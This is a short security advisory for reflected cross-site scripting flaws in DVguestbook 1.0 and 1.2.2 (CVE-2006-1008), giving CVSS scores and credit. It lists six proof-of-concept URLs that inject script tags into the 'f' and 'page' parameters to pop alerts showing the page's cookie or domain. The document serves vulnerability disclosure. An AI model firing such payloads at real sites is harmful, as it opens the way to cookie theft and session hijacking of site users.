DVguestbook 1.0 And 1.2.2 Cross Site Scripting

2006.03.10

Credit: liz0 bsdmail com

Risk: Low

Local: No

Remote: Yes

CVE: CVE-2006-1008

CWE: CWE-79

CVSS Base Score: 5.8/10

Impact Subscore: 4.9/10

Exploitability Subscore: 8.6/10

Exploit range: Remote

Attack complexity: Medium

Authentication: No required

Confidentiality impact: None

Integrity impact: Partial

Availability impact: Partial

------------------------------------------------------------------------
-------------
DVguestbook 1.0 And 1.2.2 Cross Site Scripting
Site:http://suprem.free.fr
Credit : Liz0ziM
webpage:www.biyosecurity.com
Mail :liz0 (at) bsdmail (dot) com [email concealed]
------------------------------------------------------------------------
-------------
DVguestbook 1.0 Xss
http://victim/path/dv_gbook.php?d=0&f='"><script>alert(document.cookie)<
/script>
http://victim/path/dv_gbook.php?d=0&f='"><script>alert(/BiyoSecurityTeam
/)</script>
http://victim/path/dv_gbook.php?d=0&f='"><script>alert(document.domain)<
/script>
DVguestbook 1.2.2 Xss
http://victim/path/index.php?page="><script>alert(document.cookie)</scri
pt>
http://victim/path/index.php?page="><script>alert(/Liz0ziM/)</script>
http://victim/path/index.php?page="><script>alert(document.domain)</scri
pt>
------------------------------------------------------------------------
----------------
Source:
http://www.blogcu.com/Liz0ziM/326668/
http://biyosecurity.be/bugs/dvguestbook.txt

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

DVguestbook 1.0 And 1.2.2 Cross Site Scripting

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.